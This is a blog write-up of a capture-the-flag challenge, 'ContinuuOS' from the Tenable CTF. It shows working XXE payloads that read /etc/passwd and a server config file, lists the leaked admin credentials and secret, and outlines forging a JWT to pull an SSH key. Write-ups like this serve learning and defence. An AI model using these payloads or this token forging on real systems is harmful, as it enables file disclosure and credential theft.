IT and security stuff

Tenable CTF – ContinuuOS writeup

neoh

I had time to do a couple challenges for this event. This one was the one I enjoyed the most and since it includes two different techniques, I decided to do a writeup. Enjoy

The flag is the SSH key for user operations.

ContinuuOS is a web application running under Apache 2.4.52.

We are greeted with a login prompt. Let’s try it!
Looking at the POST request when trying the login, we see it is handled by XML. The response also returns a lot of information, maybe too much. Let’s see if we can break something by sending this request to Burp Repeater.
Adding a “&” returns an error. This is clearly vulnerable to XXE. Let’s try reading some local files within the server.
Awesome! It works as intended.
<?xml version='1.0'?>

<!DOCTYPE foo [ <!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<document>

<user>&xxe;</user>
<pass>test</pass>
</document>

Maybe we can get the flag this way?

Unfortunately not…

Let’s try the XML config file!

<?xml version='1.0'?>

<!DOCTYPE foo [ <!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM "file:///var/www/html/conf.xml" >]>

<document>

<user>&xxe;</user>
<pass>test</pass>
</document>

Ok this is interesting. By reading the conf.xml file, we have a few elements such as credentials and a “secret”. Let’s try these to login into the app.

  • admin
  • Continu321!
  • 455b114503f70382f3ccd427ef45972cd2d35c41ee5abb2173d67d3ec54814f2
Once logged as the admin, we see the Operations window which allows us to run commands and read logs on the server. Due to recent attacks, the run command features have been disabled, and only the operations log is available. Let’s see what this is all about!

Clicking the Submit button on Run Command does not do anything, as it was deactivated. Let’s try the Read Log feature.

Not much useful information here. Let’s look at the request that was made.
We see something unusual here. The POST request sends not only a JWT cookie but also another JWT token. Let’s decode it and see what is going on here.
Ok good, we see how the ReadLog operation is processed. Maybe we can get the flag this way ?
Nope! It return a 400 Bad Request. What am I missing here?

After a couple minutes, I figured I forgot to use the secret key which was found in the conf.xml file.

Got it!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.